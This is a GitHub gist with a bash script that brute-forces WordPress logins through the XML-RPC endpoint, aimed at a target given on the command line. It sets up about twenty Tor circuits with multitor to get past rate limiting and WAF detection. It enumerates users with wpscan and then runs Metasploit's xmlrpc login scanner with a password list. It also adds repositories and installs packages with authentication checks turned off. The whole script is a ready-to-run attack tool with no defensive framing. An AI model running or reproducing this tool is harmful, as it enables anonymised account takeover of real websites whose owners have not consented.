Skip to content

Instantly share code, notes, and snippets.

@a9v8i
Created February 17, 2021 13:46
Show Gist options
  • Save a9v8i/b631ecd960b029ff2b44eac80f0caae4 to your computer and use it in GitHub Desktop.
Save a9v8i/b631ecd960b029ff2b44eac80f0caae4 to your computer and use it in GitHub Desktop.
Bruteforce Wordpress (XMLRPC) Bypass Recaptcha & WAF Detection
#!/bin/bash
# v10
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x wp-bruteforecer.sh;sudo ./wp-bruteforecer.sh target.com ~/Passlist.txt
RED='\e[1;31m%s\e[0m\n'
GREEN='\e[1;32m%s\e[0m\n'
YELLOW='\e[1;33m%s\e[0m\n'
BLUE='\e[1;34m%s\e[0m\n'
MAGENTO='\e[1;35m%s\e[0m\n'
CYAN='\e[1;36m%s\e[0m\n'
WHITE='\e[1;37m%s\e[0m\n'
if [ "$(id -u)" != "0" ];then
printf "$RED" "[X] Please run as RooT ..."
printf "\n\n"
exit 0
fi
MULTITOR=/usr/share/multitor
METASPLOIT=/usr/share/metasploit-framework/
UBUNTU=$(cat /etc/apt/sources.list|grep -o "deb http://http.kali.org/kali kali-rolling main non-free contrib")
DEBIAN=$(cat /etc/apt/sources.list|grep -o "deb http://ftp.us.debian.org/debian/ jessie main")
TORRC=$(cat /etc/tor/torrc|grep -o "UseBridges 1")
if [ "$UBUNTU" != "deb http://http.kali.org/kali kali-rolling main non-free contrib" ]; then
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
echo "deb-src http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
sudo apt-get -y --allow-unauthenticated install kali-archive-keyring
sudo apt-get update
fi
if [ "$DEBIAN" != "deb http://ftp.us.debian.org/debian/ jessie main" ]; then
echo "deb http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo "deb-src http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo "deb-src http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
echo "deb-src http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
sudo apt-get update
fi
if [ ! -d "$METASPLOIT" ]; then
sudo apt-get install -y metasploit-framework;sudo service postgresql start;sudo msfdb init
fi
if [ ! "$MULTITOR" ]; then
sudo apt-get install -y python python-pip seclists git tor curl netcat nodejs npm haproxy privoxy polipo wpscan obfsproxy obfs4proxy bind9-utils dnsutils;sudo npm install -g http-proxy-to-socks;cd /usr/share;sudo git clone https://github.com/trimstray/multitor.git;cd multitor;sudo chmod 755 *;sudo ./setup.sh install;cd ;
fi
if [ "$TORRC" != "UseBridges 1" ]; then
echo "UseBridges 1" >> /etc/tor/torrc
echo "Bridge 199.231.94.223:443 3DFC8571934FF62DEF4AF5BF3EFBDB47580A532C" >> /etc/tor/torrc
echo "Bridge 92.74.108.88:9042 129553DE394807C826C2088B6B4DF85C3DC7646B" >> /etc/tor/torrc
echo "Bridge 94.16.131.195:46724 491CEAB740FDEA24D588B28C6915E6EC37D65B90" >> /etc/tor/torrc
fi
sudo multitor -k
reset;clear
printf "$GREEN" " --/osssssssssssso/-- "
printf "$GREEN" " -+sss+-+--os.yo:++/.o-/sss+- "
printf "$GREEN" " /sy+++-.h.-dd++m+om/s.h.hy/:+oys/ "
printf "$GREEN" " .sy/// h/h-:d-y:/+-/+-+/-s/sodooh:///ys. "
printf "$GREEN" " -ys-ss/:y:so-/osssso++++osssso+.oo+/s-:o.sy- "
printf "$GREEN" " -ys:oossyo/+oyo/:-:.-:.:/.:/-.-:/syo/+/s+:oo:sy- "
printf "$GREEN" " /d/:-soh/-+ho-.:::--:- .os: -:-.:-/::sy+:+ysso+:d/ "
printf "$GREEN" " sy-..+oo-+h:--:..hy+y/ :s+. /y/sh..:/-:h+-oyss:.ys "
printf "$WHITE" " ys :+oo/:d/ .m-yyyo/- - -: .+oyhy-N. /d::yosd.sy "
printf "$WHITE" " oy.++++//d. ::oNdyo: .--. :oyhN+-: .d//s//y.ys "
printf "$WHITE" " :m-y+++//d- dyyy++::-. -.o.-+.- .-::/+hsyd -d/so+++.m: "
printf "$WHITE" " -d/-/+++.m- /.ohso- ://:///++++///://: :odo.+ -m.syoo:/d-"
printf "$WHITE" " :m-+++y:y+ smyms- -//+/-ohho-/+//- omsmo +y s+oy-m:"
printf "$WHITE" " sy:+++y-N- -.dy+:...-- :: ./hh/. :: --...//hh.: -N-o+/:-so"
printf "$WHITE" " yo-///s-m odohd.-.--:/o.-+/::/+-.o/:--.--hd:ho m-s+++-+y"
printf "$WHITE" " yo::/+o-m -yNy/: ...:+s.//:://.s+:... :/yNs m-h++++oy"
printf "$WHITE" " oy/hsss-N- oo:oN- .-o.:ss:--:ss:.o-. -My-oo -N-o+++.so"
printf "$WHITE" " :m :++y:y+ sNMy+: -+/:.--:////:--.:/+- -+hNNs +y-o++o-m:"
printf "$WHITE" " -d/::+o+.m- -:/+ho:. -//- ./sdo::- -m-o++++/d-"
printf "$WHITE" " :m-yo++//d- -ommMo// -: +oyNhmo- -d//s+++-m: "
printf "$WHITE" " oy /o++//d. -::/oMss- -+++s :yNy+/: .d//y+---ys "
printf "$WHITE" " ys--+o++:d/ -/sdmNysNs+/./-//-//hNyyNmmy+- /d-+y--::sy "
printf "$RED" " sy:..ooo-+h/--.-//odm/hNh--yNh+Ndo//-./:/h+-so+:+/ys "
printf "$RED" " /d-o.ssy+-+yo:/:/:-:+sho..ohs/-:://::oh+.h//syo-d/ "
printf "$RED" " -ys-oosyss:/oyy//::..-.--.--:/.//syo+-ys//o/.sy- "
printf "$RED" " -ys.sooh+d-s:+osssysssosssssso:/+/h:/yy/.sy- "
printf "$RED" " .sy/:os.h--d/o+-/+:o:/+.+o:d-y+h-o+-+ys. "
printf "$RED" " :sy+:+ s//sy-y.-h-m/om:s-y.++/+ys/ "
printf "$RED" " -+sss+/o/ s--y.s+/:++-+sss+- "
printf "$RED" " --/osssssssssssso/-- "
printf "$BLUE" " Unk9vvN "
printf "$YELLOW" " https://t.me/Unk9vvN "
printf "$CYAN" " WP-Bruteforcer "
printf "\n\n"
WEBSITE=$1
PASSLIST=$2
WP_USERS=/tmp/wp_users.txt
WP_OUTPUT=/tmp/wp_output.txt
sudo echo "$WEBSITE" > /tmp/dns.txt
sudo sed -i 's#http://##g' /tmp/dns.txt
sudo sed -i 's#https://##g' /tmp/dns.txt
DNS=$(cat /tmp/dns.txt)
sudo service tor start
sudo service postgresql start
HTTP_HTTPS=""
PORT=""
SSL=""
function XMLRPC_DETECT ()
{
CheckTor=$(curl -k --location --socks4 127.0.0.1:16379 -s http://ipinfo.io/ip)
if [ "$CheckTor" != "" ]; then
sleep 1
HTTP=$(curl -X POST --connect-timeout 3 -Is http://$DNS/xmlrpc.php | head -n 1)
HTTPS=$(curl -X POST --connect-timeout 3 -Is https://$DNS/xmlrpc.php | head -n 1)
sleep 1
if echo "$HTTPS" | grep -q "200" || echo "$HTTPS" | grep -q "301" || echo "$HTTPS" | grep -q "302" || echo "$HTTPS" | grep -q "307"; then
SSL=true
PORT="443"
HTTP_HTTPS=https
sudo wpscan --url https://$DNS --stealthy -e u -o /tmp/wp_output.txt --proxy socks4://127.0.0.1:16379 --no-banner
sudo chmod +x /tmp/wp_output.txt
if [[ -f "$WP_USERS" ]]; then
rm /tmp/wp_users.txt
fi
NUM1=$(awk '/Author Posts/{ print NR - 1 }' /tmp/wp_output.txt)
NUM2=$(awk '/Rss Generator/{ print NR - 1 }' /tmp/wp_output.txt)
if [ "$NUM1" != "" ]; then
for COPY in ${NUM1[@]};do
sed -n "$COPY"p /tmp/wp_output.txt >> /tmp/wp_users.txt
done
sudo chmod +x /tmp/wp_users.txt
sed -i 's/^.............//' /tmp/wp_users.txt
elif [ "$NUM2" != "" ]; then
for COPY in ${NUM2[@]};do
sed -n "$COPY"p /tmp/wp_output.txt >> /tmp/wp_users.txt
done
sudo chmod +x /tmp/wp_users.txt
sed -i 's/^.............//' /tmp/wp_users.txt
else
echo "$DNS" | awk -F[/.] '{print $1}' > /tmp/wp_users.txt
echo "admin" >> /tmp/wp_users.txt
echo "administrator" >> /tmp/wp_users.txt
sudo chmod +x /tmp/wp_users.txt
fi
elif echo "$HTTP" | grep -q "200" || echo "$HTTP" | grep -q "301" || echo "$HTTP" | grep -q "302" || echo "$HTTP" | grep -q "307"; then
SSL=false
PORT="80"
HTTP_HTTPS=http
sudo wpscan --url http://$DNS --stealthy -e u -o /tmp/wp_output.txt --proxy socks4://127.0.0.1:16379 --no-banner
sudo chmod +x /tmp/wp_output.txt
if [[ -f "$WP_USERS" ]]; then
rm /tmp/wp_users.txt
fi
NUM1=$(awk '/Author Posts/{ print NR - 1 }' /tmp/wp_output.txt)
NUM2=$(awk '/Rss Generator/{ print NR - 1 }' /tmp/wp_output.txt)
if [ "$NUM1" != "" ]; then
for COPY in ${NUM1[@]};do
sed -n "$COPY"p /tmp/wp_output.txt >> /tmp/wp_users.txt
done
sudo chmod +x /tmp/wp_users.txt
sed -i 's/^.............//' /tmp/wp_users.txt
elif [ "$NUM2" != "" ]; then
for COPY in ${NUM2[@]};do
sed -n "$COPY"p /tmp/wp_output.txt >> /tmp/wp_users.txt
done
sudo chmod +x /tmp/wp_users.txt
sed -i 's/^.............//' /tmp/wp_users.txt
else
echo "$DNS" | awk -F[/.] '{print $1}' > /tmp/wp_users.txt
echo "admin" >> /tmp/wp_users.txt
echo "administrator" >> /tmp/wp_users.txt
sudo chmod +x /tmp/wp_users.txt
fi
else
printf "$RED" "[X] XMLRPC is not enabled! Aborting... "
exit 0
fi
else
sleep 60
return 2
fi
}
PING=$(dig +short $DNS)
if [ "$PING" != "" ]; then
if [ ! "$WEBSITE" ]; then
printf "$RED" "[X] sudo ./wp-bruteforecer.sh target.com ~/Passlist.txt"
printf "\n\n"
exit 0
elif [ ! "$PASSLIST" ]; then
printf "$RED" "[X] sudo ./wp-bruteforecer.sh target.com ~/Passlist.txt"
printf "\n\n"
exit 0
fi
sudo multitor --init 20 --user debian-tor --socks-port 9000 --control-port 9900 --proxy privoxy
printf "$GREEN" "[i] Please wait 1 min for initial Tor Proxys..."
printf "\n\n"
sleep 60
XMLRPC_DETECT
while read USER; do
sudo msfconsole -qx "use scanner/http/wordpress_xmlrpc_login;set RHOSTS "$DNS";set RPORT "$PORT";set SSL "$SSL";set USERNAME "$USER";set PASS_FILE "$PASSLIST";set Threads 10;set STOP_ON_SUCCESS true;set Proxies socks4:127.0.0.1:16379;run;exit"
done <$WP_USERS
sudo multitor -k
else
printf "$RED" "[X] TARGET is Resolve DEAD: $WEBSITE"
sudo multitor -k
exit 0
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment